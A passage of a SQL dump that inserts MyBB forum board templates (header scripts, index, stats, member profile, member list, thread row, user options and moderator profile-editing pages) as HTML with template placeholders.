src=\"{$mybb->settings[\'bburl\']}/jscripts/popup_menu.js?ver=1600\"></script> {$stylesheets} <script type=\"text/javascript\"> <!-- var cookieDomain = \"{$mybb->settings[\'cookiedomain\']}\"; var cookiePath = \"{$mybb->settings[\'cookiepath\']}\"; var cookiePrefix = \"{$mybb->settings[\'cookieprefix\']}\"; var deleteevent_confirm = \"{$lang->deleteevent_confirm}\"; var removeattach_confirm = \"{$lang->removeattach_confirm}\"; var loading_text = \'{$lang->ajax_loading}\'; var saving_changes = \'{$lang->saving_changes}\'; var use_xmlhttprequest = \"{$mybb->settings[\'use_xmlhttprequest\']}\"; var my_post_key = \"{$mybb->post_code}\"; var imagepath = \"{$theme[\'imgdir\']}\"; // --> </script> {$newpmmsg} <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/tabcontent.js\"> /*********************************************** * Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com) * This notice MUST stay intact for legal use * Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code ***********************************************/ </script> ', '1', '1608', '', '1339745341'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1850', 'index', '<html> <head> <title>{$mybb->settings[\'bbname\']}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- lang.no_new_posts = \"{$lang->no_new_posts}\"; lang.click_mark_read = \"{$lang->click_mark_read}\"; // --> </script> </head> <body> {$header}{$tabmenu} {$forums} <script type=\"text/javascript\"> <!--// var myflowers=new ddtabcontent(\"menutabs\") myflowers.setpersist(true) myflowers.init() --> </script> {$boardstats} <dl class=\"forum_legend smalltext\"> <dt><img src=\"{$theme[\'imgdir\']}/on.gif\" alt=\"{$lang->new_posts}\" title=\"{$lang->new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt> <dd>{$lang->new_posts}</dd> <dt><img src=\"{$theme[\'imgdir\']}/off.gif\" alt=\"{$lang->no_new_posts}\" title=\"{$lang->no_new_posts}\" style=\"vertical-align: middle; padding-bottom: 4px;\" /></dt> <dd>{$lang->no_new_posts}</dd> <dt><img src=\"{$theme[\'imgdir\']}/offlock.gif\" alt=\"{$lang->forum_locked}\" title=\"{$lang->forum_locked}\" style=\"vertical-align: middle;\" /></dt> <dd>{$lang->forum_locked}</dd> </dl> <br style=\"clear: both\" /> {$footer} </body> </html>', '1', '1608', '', '1339745341'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1880', 'stats', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->board_stats}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->board_stats}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->totals}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->averages}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\"> {$lang->posts} <strong>{$stats[\'numposts\']}</strong><br /> {$lang->threads} <strong>{$stats[\'numthreads\']}</strong><br /> {$lang->members} <strong>{$stats[\'numusers\']}</strong> </td> <td class=\"trow1\" rowspan=\"3\" valign=\"top\"> {$lang->ppd} <strong>{$postsperday}</strong><br /> {$lang->tpd} <strong>{$threadsperday}</strong><br /> {$lang->mpd} <strong>{$membersperday}</strong><br /> {$lang->ppm} <strong>{$postspermember}</strong><br /> {$lang->rpt} <strong>{$repliesperthread}</strong> </td> </tr> <tr> <td class=\"tcat\" valign=\"top\"><strong>{$lang->general}</strong></td> </tr> <tr> <td class=\"trow1\"> {$lang->newest_member} {$stats[\'newest_user\']}<br /> {$lang->members_posted} <strong>{$havepostedpercent}</strong><br /> {$lang->todays_top_poster}<br /> {$lang->popular_forum} </td> </tr> </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->most_popular}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->most_replied_threads}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->most_viewed_threads}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\">{$mostreplies}</td> <td class=\"trow1\" valign=\"top\">{$mostviews}</td> </tr> </table> {$footer} </body> </html>', '1', '1608', '', '1339745376'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2054', 'username_history', '<html> <head> <title>{$mybb->settings[\'bbname\']} - Keeps a record of username changes.</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>History of username changes for {$userlink}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->username}</strong></td> <td class=\"tcat\" align=\"center\"><strong>Date</strong></td> </tr> {$username_history_row} </table> {$footer} </body> </html>', '-1', '1', '', '1350614494'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1847', 'member_profile', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->profile}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tr><td class=\"trow1\" width=\"75%\"> <span class=\"largetext\"><strong>{$formattedname}</strong></span><br /> <span class=\"smalltext\"> ({$usertitle})<br /> {$groupimage} {$userstars}<br /> <br /> <strong>{$lang->registration_date}</strong> {$memregdate}<br /> <strong>{$lang->date_of_birth}</strong> {$membday} {$membdayage}<br /> <strong>{$lang->local_time}</strong> {$localtime}<br /> <strong>{$lang->postbit_status}</strong> {$online_status} </span> </td><td width=\"25%\" align=\"right\" valign=\"middle\">{$avatar}</td></tr></table> </td> </tr> {$awaybit} </table> <br /> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" align=\"center\"> <tr> <td width=\"50%\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_forum_info}</strong></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->joined}</strong></td> <td class=\"trow1\">{$memregdate}</td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->lastvisit}</strong></td> <td class=\"trow2\">{$memlastvisitdate} {$memlastvisittime}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->total_posts}</strong></td> <td class=\"trow1\">{$memprofile[\'postnum\']} ({$lang->ppd_percent_total})<br /><span class=\"smalltext\">(<a href=\"search.php?action=finduserthreads&amp;uid={$uid}\">{$lang->find_threads}</a> &mdash; <a href=\"search.php?action=finduser&amp;uid={$uid}\">{$lang->find_posts}</a>)</span></td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->timeonline}</strong></td> <td class=\"trow2\">{$timeonline}</td> </tr> {$referrals} {$reputation} {$easyrefer} {$repoco} {$warning_level} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td colspan=\"2\" class=\"thead\"><strong>{$lang->users_contact_details}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"40%\"><strong>{$lang->homepage}</strong></td> <td class=\"trow1\">{$website}</td> </tr> {$sendemail} <tr> <td class=\"{$bgcolors[\'pm\']}\" style=\"vertical-align: top;\"><strong>{$lang->pm}</strong></td> <td class=\"{$bgcolors[\'pm\']}\"><a href=\"private.php?action=send&amp;uid={$memprofile[\'uid\']}\">{$lang->send_pm}</a> {$privatewarning}</td> </tr> <tr> <td class=\"{$bgcolors[\'icq\']}\"><strong>{$lang->icq_number}</strong></td> <td class=\"{$bgcolors[\'icq\']}\">{$memprofile[\'icq\']}</td> </tr> <tr> <td class=\"{$bgcolors[\'aim\']}\"><strong>{$lang->aim_screenname}</strong></td> <td class=\"{$bgcolors[\'aim\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=aim&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'aim\']}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'yahoo\']}\"><strong>{$lang->yahoo_id}</strong></td> <td class=\"{$bgcolors[\'yahoo\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=yahoo&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'yahoo\']}</a></td> </tr> <tr> <td class=\"{$bgcolors[\'msn\']}\"><strong>{$lang->msn}</strong></td> <td class=\"{$bgcolors[\'msn\']}\"><a href=\"javascript:;\" onclick=\"MyBB.popupWindow(\'misc.php?action=imcenter&amp;imtype=msn&amp;uid={$uid}\', \'imcenter\', 450, 300);\">{$memprofile[\'msn\']}</a></td> </tr> </table> </td> <td><img src=\"{$theme[\'imgdir\']}/pixel.gif\" height=\"1\" width=\"8\" alt=\"\"/></td> <td width=\"50%\" valign=\"top\"> {$profilefields}<!-- Profile_achivements -->{$achivementsprofile}<!-- /Profile_achivements --> {$signature} {$modoptions} {$adminoptions} {$buddy_options} </td> </tr> </table> {$footer} </body> </html>', '1', '1608', '', '1339745338'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1849', 'forumbit_depth1_cat', ' <div id=\"tabmenu_{$forum[\'fid\']}\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"6\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"cat_{$forum[\'fid\']}_img\" class=\"expander\" alt=\"{$expaltext}\" title=\"{$expaltext}\" /></div> <div><strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><div class=\"smalltext\">{$forum[\'description\']}</div></div> </td> </tr> </thead> <tbody style=\"{$expdisplay}\" id=\"cat_{$forum[\'fid\']}_e\"> <tr> <td class=\"tcat\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td> <td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td> <td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td> <td class=\"tcat\" width=\"200\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td> </tr> {$sub_forums} </tbody> </table> <br /></div>', '1', '1608', '', '1339745341'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1994', 'memberlist', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->member_list}</title> {$headerinclude} </head> <body> {$header} <form method=\"post\" action=\"memberlist.php\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"> <div class=\"float_right\"> <strong><a href=\"memberlist.php?action=search\">{$lang->advanced_search}</a></strong> </div> <div><strong>{$lang->search_members}</strong></div> </td> </tr> <tr> <td class=\"tcat\"><strong><label for=\"username\">{$lang->username}</label></strong></td> <td class=\"tcat\"><strong><label for=\"website\">{$lang->website}</label></strong></td> <td class=\"tcat\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td> </tr> <tr> <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\"> {$lang->contains}<br /> <input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 95%; margin-top: 4px;\" value=\"{$search_username}\" /> </td> <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\"> {$lang->contains}<br /> <input type=\"text\" class=\"textbox\" name=\"website\" id=\"website\" style=\"width: 96%; margin-top: 4px;\" value=\"{$search_website}\" /> </td> <td class=\"trow1\" width=\"33%\"> <select name=\"sort\" id=\"sort\" style=\"width: 95%;\"> <option value=\"username\"{$sort_selected[\'username\']}>{$lang->sort_by_username}</option> <option value=\"regdate\"{$sort_selected[\'regdate\']}>{$lang->sort_by_regdate}</option> <option value=\"reputation\"{$sort_selected[\'reputation\']}>{$lang->sort_by_reputation}</option> <option value=\"lastvisit\"{$sort_selected[\'lastvisit\']}>{$lang->sort_by_lastvisit}</option> <option value=\"postnum\"{$sort_selected[\'postnum\']}>{$lang->sort_by_posts}</option> <option value=\"referrals\"{$sort_selected[\'referrals\']}>{$lang->sort_by_referrals}</option> </select><br /> <span class=\"smalltext\"> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"ascending\"{$order_check[\'ascending\']} /> <label for=\"order_asc\">{$lang->order_asc}</label><br /> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" value=\"descending\"{$order_check[\'descending\']} /> <label for=\"order_desc\">{$lang->order_desc}</label> </span> </td> </tr> </table> <div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div> </form> {$multipage} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"7\"> <div class=\"float_right\"> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->a}\" style=\"padding: 5px;\">{$lang->a}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->b}\" style=\"padding: 5px;\">{$lang->b}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->c}\" style=\"padding: 5px;\">{$lang->c}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->d}\" style=\"padding: 5px;\">{$lang->d}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->e}\" style=\"padding: 5px;\">{$lang->e}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->f}\" style=\"padding: 5px;\">{$lang->f}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->g}\" style=\"padding: 5px;\">{$lang->g}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->h}\" style=\"padding: 5px;\">{$lang->h}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->i}\" style=\"padding: 5px;\">{$lang->i}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->j}\" style=\"padding: 5px;\">{$lang->j}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->k}\" style=\"padding: 5px;\">{$lang->k}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->l}\" style=\"padding: 5px;\">{$lang->l}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->m}\" style=\"padding: 5px;\">{$lang->m}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->n}\" style=\"padding: 5px;\">{$lang->n}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->o}\" style=\"padding: 5px;\">{$lang->o}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->p}\" style=\"padding: 5px;\">{$lang->p}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->q}\" style=\"padding: 5px;\">{$lang->q}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->r}\" style=\"padding: 5px;\">{$lang->r}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->s}\" style=\"padding: 5px;\">{$lang->s}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->t}\" style=\"padding: 5px;\">{$lang->t}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->u}\" style=\"padding: 5px;\">{$lang->u}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->v}\" style=\"padding: 5px;\">{$lang->v}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->w}\" style=\"padding: 5px;\">{$lang->w}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->x}\" style=\"padding: 5px;\">{$lang->x}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->y}\" style=\"padding: 5px;\">{$lang->y}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->z}\" style=\"padding: 5px;\">{$lang->z}</a> </div> <div><strong>{$lang->member_list}</strong></div></td> </tr> <tr> <td class=\"tcat\" width=\"1%\"><span class=\"smalltext\"><strong>{$lang->avatar}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->joined}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->lastvisit}</strong></span></td> <td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->reputation}</strong></span></td> <td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td> {$referral_header} </tr> {$users} </table> <div class=\"float_right\" style=\"padding-top: 4px;\"> <a href=\"showteam.php\"><strong>{$lang->forumteam}</strong></a> </div> {$multipage} {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '8', '1608', '', '1344964712'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1886', 'forumdisplay_thread', '<tr{$thread[\'hellban_css\']}> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\" width=\"2%\">{$icon}</td> <td class=\"{$bgcolor}{$thread_type_class}\"> {$attachment_count} <div> <span>{$prefix} {$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread[\'threadlink\']}\" class=\"{$inline_edit_class} {$new_class}\" id=\"tid_{$inline_edit_tid}\">{$thread[\'subject\']}</a>{$thread[\'multipage\']}</span> <div class=\"author smalltext\">{$thread[\'profilelink\']}</div>{$thread[\'hellban_message\']} </div> </td> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a>{$unapproved_posts}</td> <td align=\"center\" class=\"{$bgcolor}{$thread_type_class}\">{$thread[\'views\']}</td> {$rating} <td class=\"{$bgcolor}{$thread_type_class}\" style=\"white-space: nowrap; text-align: right;\"> <span class=\"lastpost smalltext\">{$lastpostdate} {$lastposttime}<br /> <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}</span> </td> {$modbit} </tr> ', '1', '1608', '', '1339904257'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1887', 'usercp_options', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_options}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_options}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->login_cookies_privacy}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td> <td><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->messaging_notification}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td> <td><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td> <td><span class=\"smalltext\"><label for=\"hideemail\">{$lang->allow_emails}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td> <td><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td> </tr> {$privatewarning} {$pms_from_buddys} <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td> <td><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotify\" id=\"pmnotify\" value=\"1\" {$pmnotifycheck} /></td> <td><span class=\"smalltext\"><label for=\"pmnotify\">{$lang->pm_notify}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"subscriptionmethod\" id=\"subscriptionmethod\"> <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option> <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option> <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->date_time_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td><span class=\"smalltext\">{$lang->date_format}</span></td> </tr> <tr> <td> <select name=\"dateformat\"> {$date_format_options} </select> </td> </tr> <tr> <td><span class=\"smalltext\">{$lang->time_format}</span></td> </tr> <tr> <td> <select name=\"timeformat\"> {$time_format_options} </select> </td> </tr> <tr> <td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td> </tr> <tr> <td>{$tzselect}</td> </tr> <tr> <td><span class=\"smalltext\">{$lang->dst_correction}</span></td> </tr> <tr> <td> <select name=\"dstcorrection\"> <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option> <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option> <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option> </select> </td> </tr> </table> </fieldset> </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->forum_display_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> {$tppselect} <tr> <td><span class=\"smalltext\">{$lang->thread_view}</span></td> </tr> <tr> <td> <select name=\"daysprune\"> <option value=\"\">{$lang->use_default}</option> <option value=\"1\" {$daysprunesel[\'1\']}>{$lang->thread_view_lastday}</option> <option value=\"5\" {$daysprunesel[\'5\']}>{$lang->thread_view_5days}</option> <option value=\"10\" {$daysprunesel[\'10\']}>{$lang->thread_view_10days}</option> <option value=\"20\" {$daysprunesel[\'20\']}>{$lang->thread_view_20days}</option> <option value=\"50\" {$daysprunesel[\'50\']}>{$lang->thread_view_50days}</option> <option value=\"75\" {$daysprunesel[\'75\']}>{$lang->thread_view_75days}</option> <option value=\"100\" {$daysprunesel[\'100\']}>{$lang->thread_view_100days}</option> <option value=\"365\" {$daysprunesel[\'365\']}>{$lang->thread_view_year}</option> <option value=\"9999\" {$daysprunesel[\'9999\']}>{$lang->thread_view_all}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->thread_view_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"classicpostbit\" id=\"classicpostbit\" value=\"1\" {$classicpostbitcheck} /></td> <td><span class=\"smalltext\"><label for=\"classicpostbit\">{$lang->show_classic_postbit}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showsigs\" id=\"showsigs\" value=\"1\" {$showsigscheck} /></td> <td><span class=\"smalltext\"><label for=\"showsigs\">{$lang->show_sigs}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showavatars\" id=\"showavatars\" value=\"1\" {$showavatarscheck} /></td> <td><span class=\"smalltext\"><label for=\"showavatars\">{$lang->show_avatars}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showquickreply\" id=\"showquickreply\" value=\"1\" {$showquickreplycheck} /></td> <td><span class=\"smalltext\"><label for=\"showquickreply\">{$lang->show_quick_reply}</label></span></td> </tr> {$pppselect} <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->thread_mode}</span></td> </tr> <tr> <td colspan=\"2\"><select name=\"threadmode\"><option value=\"\">{$lang->use_default}</option><option value=\"linear\" {$threadview[\'linear\']}>{$lang->linear}</option><option value=\"threaded\" {$threadview[\'threaded\']}>{$lang->threaded}</option></select></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->other_options}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showredirect\" id=\"showredirect\" value=\"1\" {$showredirectcheck} /></td> <td><span class=\"smalltext\"><label for=\"showredirect\">{$lang->show_redirect}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"showcodebuttons\" id=\"showcodebuttons\" value=\"1\" {$showcodebuttonscheck} /></td> <td><span class=\"smalltext\"><label for=\"showcodebuttons\">{$lang->show_codebuttons}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->style}</span></td> </tr> <tr> <td colspan=\"2\">{$stylelist}</td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->board_language}</span></td> </tr> <tr> <td colspan=\"2\"><select name=\"language\"><option value=\"\">{$lang->use_default}</option><option value=\"0\">-----------</option>{$langoptions}</select></td> </tr> </table> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_options\" /> <input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->update_options}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '1', '1608', '', '1339904267'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1889', 'modcp_editprofile', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_profile}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var mod_posts = \'{$modpost_check}\'; var susp_posts = \'{$suspost_check}\'; // --> </script> </head> <body> {$header} <form action=\"modcp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$modcp_nav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_profile}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->profile_required}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->current_username}</span></td> </tr> <tr> <td><strong>{$profile_link}</strong></td> </tr> {$requiredfields} </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->profile_optional}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td colspan=\"3\"><span class=\"smalltext\"><label><input type=\"checkbox\" class=\"checkbox\" name=\"remove_avatar\" value=\"1\" /> {$lang->remove_avatar}</label></span></td> </tr> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->birthday}</span></td> </tr> <tr> <td> <select name=\"birthday_day\"> <option value=\"\">&nbsp;</option> {$bdaydaysel} </select> </td> <td> <select name=\"birthday_month\"> <option value=\"\">&nbsp;</option> <option value=\"1\" {$bdaymonthsel[\'1\']}>{$lang->month_1}</option> <option value=\"2\" 